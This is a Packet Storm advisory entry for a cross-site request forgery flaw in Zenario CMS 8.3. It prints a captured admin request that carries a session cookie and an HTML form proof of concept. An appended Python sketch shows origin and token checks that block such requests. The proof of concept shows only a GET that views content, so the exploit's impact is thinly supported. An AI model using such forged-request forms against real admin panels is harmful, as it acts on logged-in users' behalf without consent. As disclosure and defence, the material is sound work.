Zenar Content Management System 8.3 Cross Site Request Forgery

2018-10-18T00:00:00
ID PACKETSTORM:149851
Type packetstorm
Reporter Ismail Tasdelen
Modified 2018-10-18T00:00:00

Description

                                        
                                            `# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )  
# Date: 2018-05-21  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://zenar.io/  
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997  
# Software : Zenar Content Management System 8.3  
# Version : 8.3  
# Vulnerability Type : Web Application  
# Vulnerability : Cross-Site Request Forgery ( CSRF )  
# CVE : CVE-2018-18420  
  
# A Cross-Site Request Forgery (CSRF) vulnerability was discovered in  
# version 8.3 of Zenar Content Management System via the  
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.  
  
# POC :  
  
# GET Request :  
  
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0  
Request Method: GET  
Status Code: 200 OK  
Remote Address: 213.146.173.88:80  
Referrer Policy: no-referrer-when-downgrade  
Accept: text/plain, */*; q=0.01  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: keep-alive  
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1  
Host: demo.zenar.io  
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html  
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36  
X-Requested-With: XMLHttpRequest  
  
# Query String Parameters :  
  
path: zenario__content/panels/content  
skinId:   
refinerId: html  
refinerName: content_type  
refiner__content_type: html  
_limit: 50  
_start: 0  
_item: html_10  
_sort_col: first_created_datetime  
_sort_desc: 0  
  
# CSRF HTML :  
  
<html><head>  
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>  
</head><body>  
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">  
<input type="text" name="html_" value="10" /><br />  
<input type='submit' value='Go!' />  
</form>  
</body></html>  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://twitter.com/ismailtsdln  
`
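
Added example (not part of the original advisory and not Zenario's own code): a sketch of the server-side check that rejects a request authenticated only by the session cookie, as the captured GET above is. The header name X-CSRF-Token, the token value and the cookie value are assumptions or constructed placeholders; the trusted origin is the demo host from the request on this page.

```python
import hmac
from urllib.parse import urlsplit

TRUSTED_ORIGIN = "http://demo.zenar.io"  # host from the request shown on this page
TOKEN_HEADER = "x-csrf-token"            # hypothetical header name (assumption)

def origin_of(url):
    """Return scheme://host[:port] for a URL, or None if it has no host."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def check_admin_request(headers, session_token):
    """Return (allowed, reason); session_token is the value kept server-side."""
    h = {k.lower(): v for k, v in headers.items()}
    # 1. Source check: trust Origin when sent, otherwise fall back to Referer.
    raw = h["origin"] if "origin" in h else h.get("referer")
    if origin_of(raw) != TRUSTED_ORIGIN:
        return False, "cross-origin or missing Origin/Referer"
    # 2. Token check: a session cookie alone is attached by the browser
    #    automatically, so require a secret that only same-origin script knows.
    supplied = h.get(TOKEN_HEADER, "")
    if not session_token or not hmac.compare_digest(
            supplied.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

# Constructed sample inputs (cookie and token values are placeholders).
TOKEN = "constructed-per-session-token"
CAPTURED = {  # same header set as the GET request above: cookie, no token
    "Cookie": "PHPSESSID=placeholder",
    "Referer": "http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html",
    "X-Requested-With": "XMLHttpRequest",
}
FORGED = {  # request triggered from a page on another site
    "Cookie": "PHPSESSID=placeholder",
    "Referer": "http://other-site.example/page.html",
}
LEGIT = dict(CAPTURED, **{"X-CSRF-Token": TOKEN})

if __name__ == "__main__":
    for name, req in (("captured", CAPTURED), ("forged", FORGED), ("legit", LEGIT)):
        print(name, check_admin_request(req, TOKEN))
```

The token would be generated per session at login and delivered to the admin page so that its own scripts can send it back in the header.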